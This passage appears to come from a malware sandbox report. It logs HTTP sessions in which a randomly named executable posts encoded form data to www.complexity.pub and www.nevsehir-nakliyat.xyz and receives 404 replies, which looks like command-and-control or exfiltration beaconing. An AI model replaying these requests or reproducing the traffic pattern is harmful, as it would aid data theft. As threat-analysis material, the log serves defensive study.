                                          Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                                          Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.456231217.160.0.127804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:01.931091070 CEST793OUTPOST /4c7j/ HTTP/1.1
                                          Host: www.complexity.pub
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.complexity.pub
                                          Referer: http://www.complexity.pub/4c7j/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6d 51 6b 41 33 31 39 69 6b 6e 76 72 51 6e 56 67 6c 6d 55 77 36 34 49 31 46 34 71 4a 45 30 71 75 44 51 42 53 6b 47 4a 54 47 5a 61 6f 7a 46 63 6a 4a 64 49 64 49 69 6b 52 64 75 4f 64 77 55 32 31 6c 47 31 6c 38 48 53 36 33 6b 5a 6a 68 73 61 6d 74 76 6b 50 31 4e 48 73 41 39 72 72 4b 62 71 76 71 73 44 78 79 6b 33 50 5a 42 4e 36 32 35 45 64 6d 68 51 79 38 2b 6c 41 41 33 35 51 45 41 39 4f 73 46 7a 38 48 6b 2f 66 49 5a 50 55 6f 6e 67 73 4b 42 4a 71 45 71 77 34 52 74 70 70 68 74 57 50 66 4d 42 48 35 4f 71 74 2b 31 42 4a 4b 66 6e 69 6e 68 76 74 58 4e 74 71 67 32 42 37 48 67 66 62 75 64 30 62 55 71 4a 53 41 2f 4d 3d
                                          Data Ascii: dxWljT6=spsn588TGAkFmQkA319iknvrQnVglmUw64I1F4qJE0quDQBSkGJTGZaozFcjJdIdIikRduOdwU21lG1l8HS63kZjhsamtvkP1NHsA9rrKbqvqsDxyk3PZBN625EdmhQy8+lAA35QEA9OsFz8Hk/fIZPUongsKBJqEqw4RtpphtWPfMBH5Oqt+1BJKfninhvtXNtqg2B7Hgfbud0bUqJSA/M=
                                          Sep 7, 2024 21:44:02.596792936 CEST558INHTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Sat, 07 Sep 2024 19:44:02 GMT
                                          Server: Apache
                                          Content-Encoding: gzip
                                          Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                                          Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.456232217.160.0.127804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:04.477689981 CEST10875OUTPOST /4c7j/ HTTP/1.1
                                          Host: www.complexity.pub
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.complexity.pub
                                          Referer: http://www.complexity.pub/4c7j/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6d 51 6b 41 33 31 39 69 6b 6e 76 72 51 6e 56 67 6c 6d 55 77 36 34 49 31 46 34 71 4a 45 30 69 75 43 6d 39 53 6c 6e 4a 54 55 4a 61 6f 77 46 63 6d 4a 64 49 51 49 69 38 4e 64 75 4b 6e 77 52 71 31 6b 67 35 6c 2b 32 53 36 35 6b 5a 6a 74 4d 61 6e 69 50 6b 67 31 4d 33 6f 41 39 62 72 4b 62 71 76 71 71 6e 78 6d 6c 33 50 56 68 4e 37 2b 5a 45 42 73 42 51 57 38 2b 63 33 41 33 39 36 45 54 6c 4f 73 6c 6a 38 4b 77 66 66 58 70 50 53 70 6e 67 2f 4b 42 45 79 45 75 70 44 52 73 63 68 68 75 4b 50 66 36 74 66 2b 76 75 43 39 56 4a 6d 57 64 48 32 6e 32 62 72 59 63 38 52 67 56 4a 42 62 44 7a 45 75 39 74 44 42 4a 45 52 43 70 76 77 43 48 50 52 71 34 32 36 32 79 63 6c 38 66 70 63 54 36 38 39 6b 5a 75 6e 45 32 74 53 53 32 41 73 36 36 68 55 7a 50 35 56 65 71 64 43 30 63 2b 69 46 4a 76 4d 61 46 5a 4f 63 62 70 69 42 38 49 59 79 47 59 32 6d 65 67 76 50 62 50 52 62 30 64 31 45 33 35 41 51 48 75 36 53 47 78 49 4f 4a 42 45 45 62 48 51 36 62 76 6b 6b 73 7a 68 6f 42 72 30 38 47 [TRUNCATED]
                                          Data Ascii: dxWljT6=spsn588TGAkFmQkA319iknvrQnVglmUw64I1F4qJE0iuCm9SlnJTUJaowFcmJdIQIi8NduKnwRq1kg5l+2S65kZjtManiPkg1M3oA9brKbqvqqnxml3PVhN7+ZEBsBQW8+c3A396ETlOslj8KwffXpPSpng/KBEyEupDRschhuKPf6tf+vuC9VJmWdH2n2brYc8RgVJBbDzEu9tDBJERCpvwCHPRq4262ycl8fpcT689kZunE2tSS2As66hUzP5VeqdC0c+iFJvMaFZOcbpiB8IYyGY2megvPbPRb0d1E35AQHu6SGxIOJBEEbHQ6bvkkszhoBr08GqEgTvxnXXs84zmf3PmqWFEBcDmYfxwtWgsLTEc/uRv9xkA6kL+32b3RQ4amxGpojAccbDZBtaWGqsIZ20/68hvcYSMFJ/Jgw0oTCxD8ULHhPY0JdtseKtw886flA2ONigHvHPSTjODQuCeMYNFLtk/D5iv3YG9oE/w2D8Lm6+eK9SkKurfGLkajhAFEHH7jECS9mnIQGI4kf6Jd8oDtHG7h8f6W31iu9bySwUhvGb0bGeB1jyMXb45xL5FFlDdLjPoGjA3dmeUjreIjYYjdQOR2zhWwqpyBR84AsRQ1q2RB+5aaqI8UHkCjjE/af8JUP7mxfGn/UoBubI6KOEH34ITY5gikDxGoqV1MiWg8LSNn1uPdLAGdtTnS6ENPCN9cuyF40Re2n6WfEDsnDvJgqayne/JHrYphW43iLAolEFR6O7dhjuODwGoCZoqjkF7HVxjwwtJHeZ20TdsMXhe6LYqgOe4sf/yySsfsIfGZlXuZruE9JtTGpy9X0itbL+iDsKyabZVNW6e391HsWwV9TqxsXOxbNT+ktIkUn1jEoqyztG1ll/oxDrB0w3PEUlD17ICS6//P3hvbNPwlo0puIcgymhVnpipxu0aC7Rgvb+Oo2Tm7srINLT673rECp3qNfM2IKADO3EZp+Ki9I+E7hUXKof9Enk4vWro [TRUNCATED]
                                          Sep 7, 2024 21:44:05.120832920 CEST558INHTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Sat, 07 Sep 2024 19:44:05 GMT
                                          Server: Apache
                                          Content-Encoding: gzip
                                          Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                                          Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.456233217.160.0.127804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:07.019808054 CEST503OUTGET /4c7j/?dxWljT6=hrEH6McWLCF5pgA15gNtwiWGYg9JkAgLu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW75lpPuubSjdIy5/XyCdXWUNnJg8HZvEzqXDM=&GtLD=xFGdQ6FH HTTP/1.1
                                          Host: www.complexity.pub
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:44:07.694381952 CEST745INHTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Content-Length: 601
                                          Connection: close
                                          Date: Sat, 07 Sep 2024 19:44:07 GMT
                                          Server: Apache
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.45623485.159.66.93804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:12.932871103 CEST794OUTPOST /csz1/ HTTP/1.1
                                          Host: www.nevsehir-nakliyat.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.nevsehir-nakliyat.xyz
                                          Referer: http://www.nevsehir-nakliyat.xyz/csz1/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 4d 33 58 49 4f 45 6c 38 70 57 53 2b 4f 47 4e 55 2f 73 6e 77 4b 33 4d 48 48 74 78 44 6e 64 37 4a 76 7a 69 72 35 56 54 33 57 32 49 31 4f 43 59 78 5a 65 42 30 67 71 53 48 41 51 66 66 30 6f 66 67 79 6b 75 55 43 77 7a 67 42 31 66 6b 43 77 65 45 4c 43 2b 5a 42 50 56 4f 2b 55 45 57 6f 75 79 2b 30 35 4e 48 54 75 66 44 44 37 57 6b 2b 37 33 50 6e 78 73 39 4a 45 31 75 4d 50 4f 30 79 38 45 33 30 64 54 75 61 66 6e 7a 66 4a 35 73 44 52 5a 73 30 49 62 6a 4f 56 49 53 6f 6a 2f 73 66 6e 53 42 6b 54 5a 74 76 2f 77 44 34 66 79 33 4e 63 62 7a 6b 38 70 4c 72 6a 6e 6f 6a 65 66 63 78 6e 4c 64 4f 41 3d 3d
                                          Data Ascii: dxWljT6=M3XIOEl8pWS+OGNU/snwK3MHHtxDnd7Jvzir5VT3W2I1OCYxZeB0gqSHAQff0ofgykuUCwzgB1fkCweELC+ZBPVO+UEWouy+05NHTufDD7Wk+73Pnxs9JE1uMPO0y8E30dTuafnzfJ5sDRZs0IbjOVISoj/sfnSBkTZtv/wD4fy3Ncbzk8pLrjnojefcxnLdOA==
                                          Sep 7, 2024 21:44:13.634608984 CEST225INHTTP/1.1 404 Not Found
                                          Server: nginx/1.14.1
                                          Date: Sat, 07 Sep 2024 19:44:13 GMT
                                          Content-Length: 0
                                          Connection: close
                                          X-Rate-Limit-Limit: 5s
                                          X-Rate-Limit-Remaining: 19
                                          X-Rate-Limit-Reset: 2024-09-07T19:44:18.5264901Z


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.45623585.159.66.93804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:15.486314058 CEST814OUTPOST /csz1/ HTTP/1.1
                                          Host: www.nevsehir-nakliyat.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.nevsehir-nakliyat.xyz
                                          Referer: http://www.nevsehir-nakliyat.xyz/csz1/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 4d 33 58 49 4f 45 6c 38 70 57 53 2b 4f 6d 64 55 35 50 50 77 4d 58 4d 45 4c 4e 78 44 79 74 37 46 76 7a 65 72 35 55 58 6e 57 6c 38 31 4a 69 49 78 61 66 42 30 74 4b 53 48 4c 77 66 61 36 49 65 73 79 6b 54 68 43 79 33 67 42 31 37 6b 43 78 4f 45 4c 78 47 59 41 66 56 4d 78 30 45 55 6d 4f 79 2b 30 35 4e 48 54 75 62 70 44 39 2b 6b 2b 4b 48 50 6d 51 73 2b 44 6b 31 76 4e 50 4f 30 32 38 45 7a 30 64 54 59 61 61 2f 56 66 4c 52 73 44 54 42 73 30 5a 62 6b 46 56 49 51 6d 44 2b 35 58 56 66 58 70 68 55 77 70 2f 30 6c 31 64 69 4c 49 61 4b 70 31 4e 49 63 35 6a 44 62 2b 5a 57 6f 38 6b 32 55 56 48 62 4d 45 55 34 6b 65 2f 72 34 6e 47 51 62 61 58 46 65 4d 33 4d 3d
                                          Data Ascii: dxWljT6=M3XIOEl8pWS+OmdU5PPwMXMELNxDyt7Fvzer5UXnWl81JiIxafB0tKSHLwfa6IesykThCy3gB17kCxOELxGYAfVMx0EUmOy+05NHTubpD9+k+KHPmQs+Dk1vNPO028Ez0dTYaa/VfLRsDTBs0ZbkFVIQmD+5XVfXphUwp/0l1diLIaKp1NIc5jDb+ZWo8k2UVHbMEU4ke/r4nGQbaXFeM3M=
                                          Sep 7, 2024 21:44:16.177949905 CEST225INHTTP/1.1 404 Not Found
                                          Server: nginx/1.14.1
                                          Date: Sat, 07 Sep 2024 19:44:16 GMT
                                          Content-Length: 0
                                          Connection: close
                                          X-Rate-Limit-Limit: 5s
                                          X-Rate-Limit-Remaining: 18
                                          X-Rate-Limit-Reset: 2024-09-07T19:44:18.5264901Z


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.45623685.159.66.93804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:18.030464888 CEST10896OUTPOST /csz1/ HTTP/1.1
                                          Host: www.nevsehir-nakliyat.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.nevsehir-nakliyat.xyz
                                          Referer: http://www.nevsehir-nakliyat.xyz/csz1/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 4d 33 58 49 4f 45 6c 38 70 57 53 2b 4f 6d 64 55 35 50 50 77 4d 58 4d 45 4c 4e 78 44 79 74 37 46 76 7a 65 72 35 55 58 6e 57 6b 45 31 4f 52 77 78 61 38 5a 30 73 4b 53 48 45 67 66 62 36 49 65 68 79 6b 4c 74 43 79 71 64 42 33 54 6b 42 54 57 45 4e 41 47 59 5a 50 56 4d 36 55 45 5a 6f 75 79 6e 30 35 39 44 54 75 4c 70 44 39 2b 6b 2b 49 50 50 76 68 73 2b 51 30 31 75 4d 50 4f 77 79 38 45 4c 30 62 37 6d 61 62 4c 46 66 36 78 73 44 7a 52 73 32 76 76 6b 61 6c 49 4f 68 44 2f 36 58 56 53 4a 70 68 34 38 70 38 6f 66 31 66 2b 4c 45 64 47 79 6e 4d 67 48 72 79 7a 67 71 62 43 39 36 6a 69 43 59 47 54 49 53 46 38 71 50 4f 6e 33 6f 32 64 4f 4e 31 56 67 64 41 6c 72 69 63 67 4c 46 48 45 34 53 35 44 6f 41 46 45 63 36 34 57 30 6c 4c 59 65 2f 69 2f 50 37 72 76 38 45 36 4f 49 50 49 57 61 59 63 64 47 77 61 31 49 75 46 72 52 65 44 7a 31 67 55 79 6a 50 50 56 31 73 54 71 55 47 6c 38 66 35 79 31 57 46 61 47 2b 31 78 49 2b 56 48 77 57 76 4c 2b 5a 44 6a 33 2f 76 55 77 4b 66 4b 35 64 39 5a 4d 61 78 6f 73 38 4a 5a [TRUNCATED]
                                          Data Ascii: dxWljT6=M3XIOEl8pWS+OmdU5PPwMXMELNxDyt7Fvzer5UXnWkE1ORwxa8Z0sKSHEgfb6IehykLtCyqdB3TkBTWENAGYZPVM6UEZouyn059DTuLpD9+k+IPPvhs+Q01uMPOwy8EL0b7mabLFf6xsDzRs2vvkalIOhD/6XVSJph48p8of1f+LEdGynMgHryzgqbC96jiCYGTISF8qPOn3o2dON1VgdAlricgLFHE4S5DoAFEc64W0lLYe/i/P7rv8E6OIPIWaYcdGwa1IuFrReDz1gUyjPPV1sTqUGl8f5y1WFaG+1xI+VHwWvL+ZDj3/vUwKfK5d9ZMaxos8JZGMnRh8eNBOFdcBtgdnoen6/ET/M/W13WiveWoJMHdB8NJ40YeoubzK569CVAgNE4eFoSl9Hm0z4aaqETq17SQYzuAU2tJ9+i/sCysrWEaug2idctuErizjF0o6BMmI+CEKkkusXaPbjM8KGTfTszY2PwdXGTycLJhDYejyBmC5NPTaTrqE5+7bxLqdDxExsabft1k5CE6HsXytS4TnbMFxZJooEAVYSRF/wK27CFOZOt30CDhGftXuYBrIz7VqCYQHHGH8eedIwil6vIkbYTE2daeVVefPHe2uOrEI3LF6pHNlOjOnXiNsjWSSqfZuIgqijqfnVw2ExcP3Ym0/VT5szCoK/XYWaMDVDm+fzN7QmI1QgejWzHp/X2Hz0qXqJYWZzYEvYNYSU8fS9tVUHakGN3mhqt3knbcKBhS7iHA7mMgPIETjR5dKwqFgdpO7WtrMspCmcg94r5yx1PVac5IWBJM8YuFOqBXeWeTzFXT0MnfqVWLhpO9f5T9DycK+beMkSYCccHAB4u4iR900EI5a+MIixGVczQ0+mxkaHuwmJpBUS2E5qUE6DsFuERsakd/pDfnWZsSSjs8g85n4e3wawWDVaDxP+vm2BxLvG5mGR9YnLOae3r8/epV7EqTsNF96kDquMHj49wu26b9m2fZQlgmti4Hnw7zy [TRUNCATED]
                                          Sep 7, 2024 21:44:18.855437040 CEST225INHTTP/1.1 404 Not Found
                                          Server: nginx/1.14.1
                                          Date: Sat, 07 Sep 2024 19:44:18 GMT
                                          Content-Length: 0
                                          Connection: close
                                          X-Rate-Limit-Limit: 5s
                                          X-Rate-Limit-Remaining: 19
                                          X-Rate-Limit-Reset: 2024-09-07T19:44:23.7520817Z


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.45623785.159.66.93804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:20.567056894 CEST510OUTGET /csz1/?dxWljT6=B1/oNyROsiSyJWt54sjQUnhVOao8yN6EjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eHtZJx19cpfOg85xNQ5XVPrG77fbRlwYpG0k=&GtLD=xFGdQ6FH HTTP/1.1
                                          Host: www.nevsehir-nakliyat.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:44:21.251424074 CEST225INHTTP/1.1 404 Not Found
                                          Server: nginx/1.14.1
                                          Date: Sat, 07 Sep 2024 19:44:21 GMT
                                          Content-Length: 0
                                          Connection: close
                                          X-Rate-Limit-Limit: 5s
                                          X-Rate-Limit-Remaining: 19
                                          X-Rate-Limit-Reset: 2024-09-07T19:44:26.1475682Z


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.45623818.139.62.226804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
